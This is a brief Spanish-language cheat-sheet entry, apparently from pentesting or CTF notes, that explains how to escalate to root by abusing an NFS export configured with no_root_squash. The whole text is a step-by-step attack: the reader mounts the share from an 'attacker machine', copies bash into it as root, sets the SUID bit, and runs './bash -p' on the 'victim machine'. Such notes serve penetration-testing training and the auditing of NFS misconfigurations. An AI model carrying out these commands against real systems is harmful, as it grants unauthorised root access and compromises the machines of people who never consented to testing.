no_root_squash

Revisar el archivo /etc/exports y verificar si existe un directorio configurado con no_root_squash .

Montar el directorio encontrado en la máquina atacante.

sudo mkdir /mnt/nfs-temp
sudo mount -t nfs <IP-address>:<share> /mnt/nfs-temp/ -nolock

Copiar desde la máquina atacante como usuario root el binario bash al directorio encontrado.

sudo cp /bin/bash /mnt/nfs-temp/<share>

Asignar privilegios de SUID (Set User ID) al binario bash copiado.

sudo chmod +s bash

Ejecutar desde la máquina victima el binario bash.

cd <share>
./bash -p